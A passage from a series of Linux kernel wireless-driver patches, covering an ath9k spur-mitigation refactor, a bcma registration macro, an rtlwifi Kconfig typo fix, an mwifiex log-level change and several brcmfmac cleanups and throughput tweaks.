AR_EEPROM_MODAL_SPURS; i++) { - cur_bb_spur = ah->eep_ops->get_spur_channel(ah, i, is2GHz); - if (AR_NO_SPUR == cur_bb_spur) - break; - cur_bb_spur = cur_bb_spur - (chan->channel * 10); - if ((cur_bb_spur > -95) && (cur_bb_spur < 95)) { - bb_spur = cur_bb_spur; - break; - } - } - - if (AR_NO_SPUR == bb_spur) - return; - - bin = bb_spur * 32; - - tmp = REG_READ(ah, AR_PHY_TIMING_CTRL4(0)); - new = tmp | (AR_PHY_TIMING_CTRL4_ENABLE_SPUR_RSSI | - AR_PHY_TIMING_CTRL4_ENABLE_SPUR_FILTER | - AR_PHY_TIMING_CTRL4_ENABLE_CHAN_MASK | - AR_PHY_TIMING_CTRL4_ENABLE_PILOT_MASK); - - REG_WRITE(ah, AR_PHY_TIMING_CTRL4(0), new); - - new = (AR_PHY_SPUR_REG_MASK_RATE_CNTL | - AR_PHY_SPUR_REG_ENABLE_MASK_PPM | - AR_PHY_SPUR_REG_MASK_RATE_SELECT | - AR_PHY_SPUR_REG_ENABLE_VIT_SPUR_RSSI | - SM(SPUR_RSSI_THRESH, AR_PHY_SPUR_REG_SPUR_RSSI_THRESH)); - REG_WRITE(ah, AR_PHY_SPUR_REG, new); - - spur_delta_phase = ((bb_spur * 524288) / 100) & - AR_PHY_TIMING11_SPUR_DELTA_PHASE; - - denominator = IS_CHAN_2GHZ(chan) ? 440 : 400; - spur_freq_sd = ((bb_spur * 2048) / denominator) & 0x3ff; - - new = (AR_PHY_TIMING11_USE_SPUR_IN_AGC | - SM(spur_freq_sd, AR_PHY_TIMING11_SPUR_FREQ_SD) | - SM(spur_delta_phase, AR_PHY_TIMING11_SPUR_DELTA_PHASE)); - REG_WRITE(ah, AR_PHY_TIMING11, new); + static const int inc[4] = { 0, 100, 0, 0 }; cur_bin = -6000; upper = bin + 100; @@ -343,6 +282,7 @@ static void ar5008_hw_spur_mitigate(struct ath_hw *ah, int pilot_mask = 0; int chan_mask = 0; int bp = 0; + for (bp = 0; bp < 30; bp++) { if ((cur_bin > lower) && (cur_bin < upper)) { pilot_mask = pilot_mask | 0x1 << bp; @@ -361,7 +301,6 @@ static void ar5008_hw_spur_mitigate(struct ath_hw *ah, for (i = 0; i < 123; i++) { if ((cur_vit_mask > lower) && (cur_vit_mask < upper)) { - /* workaround for gcc bug #37014 */ volatile int tmp_v = abs(cur_vit_mask - bin); @@ -466,6 +405,78 @@ static void ar5008_hw_spur_mitigate(struct ath_hw *ah, REG_WRITE(ah, AR_PHY_MASK2_P_61_45, tmp_mask); } +/** + * ar5008_hw_spur_mitigate - convert baseband spur frequency for external radios + * @ah: atheros hardware structure + * @chan: + * + * For non single-chip solutions. Converts to baseband spur frequency given the + * input channel frequency and compute register settings below. + */ +static void ar5008_hw_spur_mitigate(struct ath_hw *ah, + struct ath9k_channel *chan) +{ + int bb_spur = AR_NO_SPUR; + int bin; + int spur_freq_sd; + int spur_delta_phase; + int denominator; + int tmp, new; + int i; + + int8_t mask_m[123]; + int8_t mask_p[123]; + int cur_bb_spur; + bool is2GHz = IS_CHAN_2GHZ(chan); + + memset(&mask_m, 0, sizeof(int8_t) * 123); + memset(&mask_p, 0, sizeof(int8_t) * 123); + + for (i = 0; i < AR_EEPROM_MODAL_SPURS; i++) { + cur_bb_spur = ah->eep_ops->get_spur_channel(ah, i, is2GHz); + if (AR_NO_SPUR == cur_bb_spur) + break; + cur_bb_spur = cur_bb_spur - (chan->channel * 10); + if ((cur_bb_spur > -95) && (cur_bb_spur < 95)) { + bb_spur = cur_bb_spur; + break; + } + } + + if (AR_NO_SPUR == bb_spur) + return; + + bin = bb_spur * 32; + + tmp = REG_READ(ah, AR_PHY_TIMING_CTRL4(0)); + new = tmp | (AR_PHY_TIMING_CTRL4_ENABLE_SPUR_RSSI | + AR_PHY_TIMING_CTRL4_ENABLE_SPUR_FILTER | + AR_PHY_TIMING_CTRL4_ENABLE_CHAN_MASK | + AR_PHY_TIMING_CTRL4_ENABLE_PILOT_MASK); + + REG_WRITE(ah, AR_PHY_TIMING_CTRL4(0), new); + + new = (AR_PHY_SPUR_REG_MASK_RATE_CNTL | + AR_PHY_SPUR_REG_ENABLE_MASK_PPM | + AR_PHY_SPUR_REG_MASK_RATE_SELECT | + AR_PHY_SPUR_REG_ENABLE_VIT_SPUR_RSSI | + SM(SPUR_RSSI_THRESH, AR_PHY_SPUR_REG_SPUR_RSSI_THRESH)); + REG_WRITE(ah, AR_PHY_SPUR_REG, new); + + spur_delta_phase = ((bb_spur * 524288) / 100) & + AR_PHY_TIMING11_SPUR_DELTA_PHASE; + + denominator = IS_CHAN_2GHZ(chan) ? 440 : 400; + spur_freq_sd = ((bb_spur * 2048) / denominator) & 0x3ff; + + new = (AR_PHY_TIMING11_USE_SPUR_IN_AGC | + SM(spur_freq_sd, AR_PHY_TIMING11_SPUR_FREQ_SD) | + SM(spur_delta_phase, AR_PHY_TIMING11_SPUR_DELTA_PHASE)); + REG_WRITE(ah, AR_PHY_TIMING11, new); + + ar5008_hw_cmn_spur_mitigate(ah, chan, bin); +} + /** * ar5008_hw_rf_alloc_ext_banks - allocates banks for external radio programming * @ah: atheros hardware structure diff --git a/drivers/net/wireless/ath/ath9k/ar9002_phy.c b/drivers/net/wireless/ath/ath9k/ar9002_phy.c index fc08162b5820..db6624527d99 100644 --- a/drivers/net/wireless/ath/ath9k/ar9002_phy.c +++ b/drivers/net/wireless/ath/ath9k/ar9002_phy.c @@ -169,29 +169,17 @@ static void ar9002_hw_spur_mitigate(struct ath_hw *ah, { int bb_spur = AR_NO_SPUR; int freq; - int bin, cur_bin; + int bin; int bb_spur_off, spur_subchannel_sd; int spur_freq_sd; int spur_delta_phase; int denominator; - int upper, lower, cur_vit_mask; int tmp, newVal; int i; - static const int pilot_mask_reg[4] = { - AR_PHY_TIMING7, AR_PHY_TIMING8, - AR_PHY_PILOT_MASK_01_30, AR_PHY_PILOT_MASK_31_60 - }; - static const int chan_mask_reg[4] = { - AR_PHY_TIMING9, AR_PHY_TIMING10, - AR_PHY_CHANNEL_MASK_01_30, AR_PHY_CHANNEL_MASK_31_60 - }; - static const int inc[4] = { 0, 100, 0, 0 }; struct chan_centers centers; int8_t mask_m[123]; int8_t mask_p[123]; - int8_t mask_amt; - int tmp_mask; int cur_bb_spur; bool is2GHz = IS_CHAN_2GHZ(chan); @@ -288,135 +276,7 @@ static void ar9002_hw_spur_mitigate(struct ath_hw *ah, newVal = spur_subchannel_sd << AR_PHY_SFCORR_SPUR_SUBCHNL_SD_S; REG_WRITE(ah, AR_PHY_SFCORR_EXT, newVal); - cur_bin = -6000; - upper = bin + 100; - lower = bin - 100; - - for (i = 0; i < 4; i++) { - int pilot_mask = 0; - int chan_mask = 0; - int bp = 0; - for (bp = 0; bp < 30; bp++) { - if ((cur_bin > lower) && (cur_bin < upper)) { - pilot_mask = pilot_mask | 0x1 << bp; - chan_mask = chan_mask | 0x1 << bp; - } - cur_bin += 100; - } - cur_bin += inc[i]; - REG_WRITE(ah, pilot_mask_reg[i], pilot_mask); - REG_WRITE(ah, chan_mask_reg[i], chan_mask); - } - - cur_vit_mask = 6100; - upper = bin + 120; - lower = bin - 120; - - for (i = 0; i < 123; i++) { - if ((cur_vit_mask > lower) && (cur_vit_mask < upper)) { - - /* workaround for gcc bug #37014 */ - volatile int tmp_v = abs(cur_vit_mask - bin); - - if (tmp_v < 75) - mask_amt = 1; - else - mask_amt = 0; - if (cur_vit_mask < 0) - mask_m[abs(cur_vit_mask / 100)] = mask_amt; - else - mask_p[cur_vit_mask / 100] = mask_amt; - } - cur_vit_mask -= 100; - } - - tmp_mask = (mask_m[46] << 30) | (mask_m[47] << 28) - | (mask_m[48] << 26) | (mask_m[49] << 24) - | (mask_m[50] << 22) | (mask_m[51] << 20) - | (mask_m[52] << 18) | (mask_m[53] << 16) - | (mask_m[54] << 14) | (mask_m[55] << 12) - | (mask_m[56] << 10) | (mask_m[57] << 8) - | (mask_m[58] << 6) | (mask_m[59] << 4) - | (mask_m[60] << 2) | (mask_m[61] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK_1, tmp_mask); - REG_WRITE(ah, AR_PHY_VIT_MASK2_M_46_61, tmp_mask); - - tmp_mask = (mask_m[31] << 28) - | (mask_m[32] << 26) | (mask_m[33] << 24) - | (mask_m[34] << 22) | (mask_m[35] << 20) - | (mask_m[36] << 18) | (mask_m[37] << 16) - | (mask_m[48] << 14) | (mask_m[39] << 12) - | (mask_m[40] << 10) | (mask_m[41] << 8) - | (mask_m[42] << 6) | (mask_m[43] << 4) - | (mask_m[44] << 2) | (mask_m[45] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK_2, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_M_31_45, tmp_mask); - - tmp_mask = (mask_m[16] << 30) | (mask_m[16] << 28) - | (mask_m[18] << 26) | (mask_m[18] << 24) - | (mask_m[20] << 22) | (mask_m[20] << 20) - | (mask_m[22] << 18) | (mask_m[22] << 16) - | (mask_m[24] << 14) | (mask_m[24] << 12) - | (mask_m[25] << 10) | (mask_m[26] << 8) - | (mask_m[27] << 6) | (mask_m[28] << 4) - | (mask_m[29] << 2) | (mask_m[30] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK_3, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_M_16_30, tmp_mask); - - tmp_mask = (mask_m[0] << 30) | (mask_m[1] << 28) - | (mask_m[2] << 26) | (mask_m[3] << 24) - | (mask_m[4] << 22) | (mask_m[5] << 20) - | (mask_m[6] << 18) | (mask_m[7] << 16) - | (mask_m[8] << 14) | (mask_m[9] << 12) - | (mask_m[10] << 10) | (mask_m[11] << 8) - | (mask_m[12] << 6) | (mask_m[13] << 4) - | (mask_m[14] << 2) | (mask_m[15] << 0); - REG_WRITE(ah, AR_PHY_MASK_CTL, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_M_00_15, tmp_mask); - - tmp_mask = (mask_p[15] << 28) - | (mask_p[14] << 26) | (mask_p[13] << 24) - | (mask_p[12] << 22) | (mask_p[11] << 20) - | (mask_p[10] << 18) | (mask_p[9] << 16) - | (mask_p[8] << 14) | (mask_p[7] << 12) - | (mask_p[6] << 10) | (mask_p[5] << 8) - | (mask_p[4] << 6) | (mask_p[3] << 4) - | (mask_p[2] << 2) | (mask_p[1] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_1, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_15_01, tmp_mask); - - tmp_mask = (mask_p[30] << 28) - | (mask_p[29] << 26) | (mask_p[28] << 24) - | (mask_p[27] << 22) | (mask_p[26] << 20) - | (mask_p[25] << 18) | (mask_p[24] << 16) - | (mask_p[23] << 14) | (mask_p[22] << 12) - | (mask_p[21] << 10) | (mask_p[20] << 8) - | (mask_p[19] << 6) | (mask_p[18] << 4) - | (mask_p[17] << 2) | (mask_p[16] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_2, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_30_16, tmp_mask); - - tmp_mask = (mask_p[45] << 28) - | (mask_p[44] << 26) | (mask_p[43] << 24) - | (mask_p[42] << 22) | (mask_p[41] << 20) - | (mask_p[40] << 18) | (mask_p[39] << 16) - | (mask_p[38] << 14) | (mask_p[37] << 12) - | (mask_p[36] << 10) | (mask_p[35] << 8) - | (mask_p[34] << 6) | (mask_p[33] << 4) - | (mask_p[32] << 2) | (mask_p[31] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_3, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_45_31, tmp_mask); - - tmp_mask = (mask_p[61] << 30) | (mask_p[60] << 28) - | (mask_p[59] << 26) | (mask_p[58] << 24) - | (mask_p[57] << 22) | (mask_p[56] << 20) - | (mask_p[55] << 18) | (mask_p[54] << 16) - | (mask_p[53] << 14) | (mask_p[52] << 12) - | (mask_p[51] << 10) | (mask_p[50] << 8) - | (mask_p[49] << 6) | (mask_p[48] << 4) - | (mask_p[47] << 2) | (mask_p[46] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_4, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_61_45, tmp_mask); + ar5008_hw_cmn_spur_mitigate(ah, chan, bin); REGWRITE_BUFFER_FLUSH(ah); } diff --git a/drivers/net/wireless/ath/ath9k/hw.h b/drivers/net/wireless/ath/ath9k/hw.h index c1d2d0340feb..e8454db17634 100644 --- a/drivers/net/wireless/ath/ath9k/hw.h +++ b/drivers/net/wireless/ath/ath9k/hw.h @@ -1119,6 +1119,8 @@ bool ar9003_is_paprd_enabled(struct ath_hw *ah); void ar9003_hw_set_chain_masks(struct ath_hw *ah, u8 rx, u8 tx); void ar9003_hw_init_rate_txpower(struct ath_hw *ah, u8 *rate_array, struct ath9k_channel *chan); +void ar5008_hw_cmn_spur_mitigate(struct ath_hw *ah, + struct ath9k_channel *chan, int bin); void ar5008_hw_init_rate_txpower(struct ath_hw *ah, int16_t *rate_array, struct ath9k_channel *chan, int ht40_delta); From cacce073bfd2b4091fbc58e906e7a9a21f538ff6 Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Thu, 14 May 2015 23:05:49 +0200 Subject: [PATCH 217/872] bcma: add module_bcma_driver() This makes it possible to save some lines of code in drivers with an simple bcma driver registration. Signed-off-by: Hauke Mehrtens Signed-off-by: Kalle Valo --- include/linux/bcma/bcma.h | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/include/linux/bcma/bcma.h b/include/linux/bcma/bcma.h index e34f906647d3..2ff4a9961e1d 100644 --- a/include/linux/bcma/bcma.h +++ b/include/linux/bcma/bcma.h @@ -305,6 +305,15 @@ int __bcma_driver_register(struct bcma_driver *drv, struct module *owner); extern void bcma_driver_unregister(struct bcma_driver *drv); +/* module_bcma_driver() - Helper macro for drivers that don't do + * anything special in module init/exit. This eliminates a lot of + * boilerplate. Each module may only use this macro once, and + * calling it replaces module_init() and module_exit() + */ +#define module_bcma_driver(__bcma_driver) \ + module_driver(__bcma_driver, bcma_driver_register, \ + bcma_driver_unregister) + /* Set a fallback SPROM. * See kdoc at the function definition for complete documentation. */ extern int bcma_arch_register_fallback_sprom( From 7b457dd0d631ecc39b5ed88d551c76d0471a11b1 Mon Sep 17 00:00:00 2001 From: Kevin Lo Date: Tue, 19 May 2015 10:18:34 +0800 Subject: [PATCH 218/872] rtlwifi: fix typos in Kconfig This patch fixes typos in drivers/net/wirless/rtlwifi/Kconfig. Signed-off-by: Kevin Lo Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/Kconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/rtlwifi/Kconfig b/drivers/net/wireless/rtlwifi/Kconfig index 5cf509d346e8..73067cac289c 100644 --- a/drivers/net/wireless/rtlwifi/Kconfig +++ b/drivers/net/wireless/rtlwifi/Kconfig @@ -100,7 +100,7 @@ config RTL8821AE select RTLWIFI_PCI select RTLBTCOEXIST ---help--- - This is the driver for Realtek RTL8i821AE/RTL8812AE 802.11av PCIe + This is the driver for Realtek RTL8821AE/RTL8812AE 802.11ac PCIe wireless network adapters. If you choose to build it as a module, it will be called rtl8821ae From ec21dc4a00905acb6c51eef0c29073e71e6e7ca1 Mon Sep 17 00:00:00 2001 From: Avinash Patil Date: Wed, 20 May 2015 16:36:06 +0530 Subject: [PATCH 219/872] mwifiex: reduce severity of debug messages for mgmt rx This would ensure dmesg logs are not spammed with "unknown mgmt frame subtype" messages. Reviewed-by: James Cameron Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/util.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/mwifiex/util.c b/drivers/net/wireless/mwifiex/util.c index 3c0b3c1cf259..370323a47ecb 100644 --- a/drivers/net/wireless/mwifiex/util.c +++ b/drivers/net/wireless/mwifiex/util.c @@ -350,8 +350,8 @@ mwifiex_parse_mgmt_packet(struct mwifiex_private *priv, u8 *payload, u16 len, } break; default: - mwifiex_dbg(priv->adapter, ERROR, - "unknown mgmt frame subytpe %#x\n", stype); + mwifiex_dbg(priv->adapter, INFO, + "unknown mgmt frame subtype %#x\n", stype); } return 0; From f58001fa95703ac275efe7d53fb7ca8613618b09 Mon Sep 17 00:00:00 2001 From: Arend van Spriel Date: Wed, 20 May 2015 14:09:47 +0200 Subject: [PATCH 220/872] brcmfmac: allow device tree node without 'interrupts' property As described in the device tree bindings for 'brcm,bcm4329-fmac' nodes, the interrupts property is optional. So adding a check for the presence of this property before attempting to parse and map the interrupt. If not present or parsing fails return and fallback to in-band sdio interrupt. Reviewed-by: Hante Meuleman Reviewed-by: Pieter-Paul Giesberts Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/of.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/of.c b/drivers/net/wireless/brcm80211/brcmfmac/of.c index c824570ddea3..03f35e0c52ca 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/of.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/of.c @@ -39,10 +39,16 @@ void brcmf_of_probe(struct brcmf_sdio_dev *sdiodev) if (!sdiodev->pdata) return; + if (of_property_read_u32(np, "brcm,drive-strength", &val) == 0) + sdiodev->pdata->drive_strength = val; + + /* make sure there are interrupts defined in the node */ + if (!of_find_property(np, "interrupts", NULL)) + return; + irq = irq_of_parse_and_map(np, 0); if (!irq) { brcmf_err("interrupt could not be mapped\n"); - devm_kfree(dev, sdiodev->pdata); return; } irqf = irqd_get_trigger_type(irq_get_irq_data(irq)); @@ -50,7 +56,4 @@ void brcmf_of_probe(struct brcmf_sdio_dev *sdiodev) sdiodev->pdata->oob_irq_supported = true; sdiodev->pdata->oob_irq_nr = irq; sdiodev->pdata->oob_irq_flags = irqf; - - if (of_property_read_u32(np, "brcm,drive-strength", &val) == 0) - sdiodev->pdata->drive_strength = val; } From 464a5f3f0429c5a6d38d3b4899d38c4b66b18f02 Mon Sep 17 00:00:00 2001 From: Hante Meuleman Date: Wed, 20 May 2015 14:09:48 +0200 Subject: [PATCH 221/872] brcmfmac: Improve throughput by scheduling msbug flow worker. The tx flow worker in msgbuf gets scheduled at tx till a certain threshold has been reached. Then the tx completes will take over the scheduling. When amsdu and ampdu is used the frames are transferred wireless in a very bulky fashion, in combination with this scheduling algorithm and buffer limiters in the stack this can result in limited throughput. This change causes the flow worker to be scheduled more frequently from tx. Reviewed-by: Arend Van Spriel Reviewed-by: Franky (Zhenhui) Lin Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Daniel (Deognyoun) Kim Signed-off-by: Hante Meuleman Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/flowring.c | 5 +++-- drivers/net/wireless/brcm80211/brcmfmac/flowring.h | 4 ++-- drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c | 9 ++++++--- 3 files changed, 11 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/flowring.c b/drivers/net/wireless/brcm80211/brcmfmac/flowring.c index eb1325371d3a..59440631fec5 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/flowring.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/flowring.c @@ -249,8 +249,8 @@ void brcmf_flowring_delete(struct brcmf_flowring *flow, u8 flowid) } -void brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, - struct sk_buff *skb) +u32 brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, + struct sk_buff *skb) { struct brcmf_flowring_ring *ring; @@ -271,6 +271,7 @@ void brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, if (skb_queue_len(&ring->skblist) < BRCMF_FLOWRING_LOW) brcmf_flowring_block(flow, flowid, false); } + return skb_queue_len(&ring->skblist); } diff --git a/drivers/net/wireless/brcm80211/brcmfmac/flowring.h b/drivers/net/wireless/brcm80211/brcmfmac/flowring.h index a34cd394c616..5551861a44bc 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/flowring.h +++ b/drivers/net/wireless/brcm80211/brcmfmac/flowring.h @@ -64,8 +64,8 @@ u32 brcmf_flowring_create(struct brcmf_flowring *flow, u8 da[ETH_ALEN], void brcmf_flowring_delete(struct brcmf_flowring *flow, u8 flowid); void brcmf_flowring_open(struct brcmf_flowring *flow, u8 flowid); u8 brcmf_flowring_tid(struct brcmf_flowring *flow, u8 flowid); -void brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, - struct sk_buff *skb); +u32 brcmf_flowring_enqueue(struct brcmf_flowring *flow, u8 flowid, + struct sk_buff *skb); struct sk_buff *brcmf_flowring_dequeue(struct brcmf_flowring *flow, u8 flowid); void brcmf_flowring_reinsert(struct brcmf_flowring *flow, u8 flowid, struct sk_buff *skb); diff --git a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c index 4ec9811f49c8..b182f53e1c20 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c @@ -73,7 +73,7 @@ #define BRCMF_MSGBUF_TX_FLUSH_CNT1 32 #define BRCMF_MSGBUF_TX_FLUSH_CNT2 96 -#define BRCMF_MSGBUF_DELAY_TXWORKER_THRS 64 +#define BRCMF_MSGBUF_DELAY_TXWORKER_THRS 96 #define BRCMF_MSGBUF_TRICKLE_TXWORKER_THRS 32 struct msgbuf_common_hdr { @@ -797,6 +797,8 @@ static int brcmf_msgbuf_txdata(struct brcmf_pub *drvr, int ifidx, struct brcmf_flowring *flow = msgbuf->flow; struct ethhdr *eh = (struct ethhdr *)(skb->data); u32 flowid; + u32 queue_count; + bool force; flowid = brcmf_flowring_lookup(flow, eh->h_dest, skb->priority, ifidx); if (flowid == BRCMF_FLOWRING_INVALID_ID) { @@ -804,8 +806,9 @@ static int brcmf_msgbuf_txdata(struct brcmf_pub *drvr, int ifidx, if (flowid == BRCMF_FLOWRING_INVALID_ID) return -ENOMEM; } - brcmf_flowring_enqueue(flow, flowid, skb); - brcmf_msgbuf_schedule_txdata(msgbuf, flowid, false); + queue_count = brcmf_flowring_enqueue(flow, flowid, skb); + force = ((queue_count % BRCMF_MSGBUF_TRICKLE_TXWORKER_THRS) == 0); + brcmf_msgbuf_schedule_txdata(msgbuf, flowid, force); return 0; } From fd5e8cb8178ac8cb549c207500006538624537d7 Mon Sep 17 00:00:00 2001 From: Franky Lin Date: Wed, 20 May 2015 14:09:49 +0200 Subject: [PATCH 222/872] brcmfmac: remove pci shared structure rev4 support All pcie full dongle chips supported by fmac are using rev 5+ shared structure. This patch removes the rev4 related code. Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Hante Meuleman Reviewed-by: Arend Van Spriel Signed-off-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/pcie.c | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c index 79ca24e6d2c5..6ca3037f67d3 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c @@ -112,10 +112,9 @@ enum brcmf_pcie_state { BRCMF_PCIE_MB_INT_D2H3_DB0 | \ BRCMF_PCIE_MB_INT_D2H3_DB1) -#define BRCMF_PCIE_MIN_SHARED_VERSION 4 +#define BRCMF_PCIE_MIN_SHARED_VERSION 5 #define BRCMF_PCIE_MAX_SHARED_VERSION 5 #define BRCMF_PCIE_SHARED_VERSION_MASK 0x00FF -#define BRCMF_PCIE_SHARED_TXPUSH_SUPPORT 0x4000 #define BRCMF_PCIE_FLAGS_HTOD_SPLIT 0x4000 #define BRCMF_PCIE_FLAGS_DTOH_SPLIT 0x8000 @@ -1280,11 +1279,6 @@ brcmf_pcie_init_share_ram_info(struct brcmf_pciedev_info *devinfo, brcmf_err("Unsupported PCIE version %d\n", version); return -EINVAL; } - if (shared->flags & BRCMF_PCIE_SHARED_TXPUSH_SUPPORT) { - brcmf_err("Unsupported legacy TX mode 0x%x\n", - shared->flags & BRCMF_PCIE_SHARED_TXPUSH_SUPPORT); - return -EINVAL; - } addr = sharedram_addr + BRCMF_SHARED_MAX_RXBUFPOST_OFFSET; shared->max_rxbufpost = brcmf_pcie_read_tcm16(devinfo, addr); From c2d4182edc0525dc912e166f4fc04cb58c5d5184 Mon Sep 17 00:00:00 2001 From: Franky Lin Date: Wed, 20 May 2015 14:09:50 +0200 Subject: [PATCH 223/872] brcmfmac: remove dummy cache flush/invalidate function brcmf_dma_flush and brcmf_dma_invalidate_cache are not necessary and have never been implemented. Reviewed-by: Pieter-Paul Giesberts Reviewed-by: Hante Meuleman Reviewed-by: Arend Van Spriel Signed-off-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- .../wireless/brcm80211/brcmfmac/commonring.c | 18 ------------------ .../net/wireless/brcm80211/brcmfmac/msgbuf.c | 11 ----------- drivers/net/wireless/brcm80211/brcmfmac/pcie.c | 11 ----------- 3 files changed, 40 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/commonring.c b/drivers/net/wireless/brcm80211/brcmfmac/commonring.c index 77656c711bed..26c65872dae3 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/commonring.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/commonring.c @@ -22,17 +22,6 @@ #include "core.h" #include "commonring.h" - -/* dma flushing needs implementation for mips and arm platforms. Should - * be put in util. Note, this is not real flushing. It is virtual non - * cached memory. Only write buffers should have to be drained. Though - * this may be different depending on platform...... - * SEE ALSO msgbuf.c - */ -#define brcmf_dma_flush(addr, len) -#define brcmf_dma_invalidate_cache(addr, len) - - void brcmf_commonring_register_cb(struct brcmf_commonring *commonring, int (*cr_ring_bell)(void *ctx), int (*cr_update_rptr)(void *ctx), @@ -206,14 +195,9 @@ int brcmf_commonring_write_complete(struct brcmf_commonring *commonring) address = commonring->buf_addr; address += (commonring->f_ptr * commonring->item_len); if (commonring->f_ptr > commonring->w_ptr) { - brcmf_dma_flush(address, - (commonring->depth - commonring->f_ptr) * - commonring->item_len); address = commonring->buf_addr; commonring->f_ptr = 0; } - brcmf_dma_flush(address, (commonring->w_ptr - commonring->f_ptr) * - commonring->item_len); commonring->f_ptr = commonring->w_ptr; @@ -258,8 +242,6 @@ void *brcmf_commonring_get_read_ptr(struct brcmf_commonring *commonring, if (commonring->r_ptr == commonring->depth) commonring->r_ptr = 0; - brcmf_dma_invalidate_cache(ret_addr, *n_ items * commonring->item_len); - return ret_addr; } diff --git a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c index b182f53e1c20..a932e45fc0ee 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c @@ -278,16 +278,6 @@ struct brcmf_msgbuf_pktids { struct brcmf_msgbuf_pktid *array; }; - -/* dma flushing needs implementation for mips and arm platforms. Should - * be put in util. Note, this is not real flushing. It is virtual non - * cached memory. Only write buffers should have to be drained. Though - * this may be different depending on platform...... - */ -#define brcmf_dma_flush(addr, len) -#define brcmf_dma_invalidate_cache(addr, len) - - static void brcmf_msgbuf_rxbuf_ioctlresp_post(struct brcmf_msgbuf *msgbuf); @@ -462,7 +452,6 @@ static int brcmf_msgbuf_tx_ioctl(struct brcmf_pub *drvr, int ifidx, memcpy(msgbuf->ioctbuf, buf, buf_len); else memset(msgbuf->ioctbuf, 0, buf_len); - brcmf_dma_flush(ioctl_buf, buf_len); err = brcmf_commonring_write_complete(commonring); brcmf_commonring_unlock(commonring); diff --git a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c index 6ca3037f67d3..2bc24a4e566b 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c @@ -276,15 +276,6 @@ static const u32 brcmf_ring_itemsize[BRCMF_NROF_COMMON_MSGRINGS] = { }; -/* dma flushing needs implementation for mips and arm platforms. Should - * be put in util. Note, this is not real flushing. It is virtual non - * cached memory. Only write buffers should have to be drained. Though - * this may be different depending on platform...... - */ -#define brcmf_dma_flush(addr, len) -#define brcmf_dma_invalidate_cache(addr, len) - - static u32 brcmf_pcie_read_reg32(struct brcmf_pciedev_info *devinfo, u32 reg_offset) { @@ -1174,7 +1165,6 @@ static int brcmf_pcie_init_scratchbuffers(struct brcmf_pciedev_info *devinfo) goto fail; memset(devinfo->shared.scratch, 0, BRCMF_DMA_D2H_SCRATCH_BUF_LEN); - brcmf_dma_flush(devinfo->shared.scratch, BRCMF_DMA_D2H_SCRATCH_BUF_LEN); addr = devinfo->shared.tcm_base_address + BRCMF_SHARED_DMA_SCRATCH_ADDR_OFFSET; @@ -1192,7 +1182,6 @@ static int brcmf_pcie_init_scratchbuffers(struct brcmf_pciedev_info *devinfo) goto fail; memset(devinfo->shared.ringupd, 0, BRCMF_DMA_D2H_RINGUPD_BUF_LEN); - brcmf_dma_flush(devinfo->shared.ringupd, BRCMF_DMA_D2H_RINGUPD_BUF_LEN); addr = devinfo->shared.tcm_base_address + 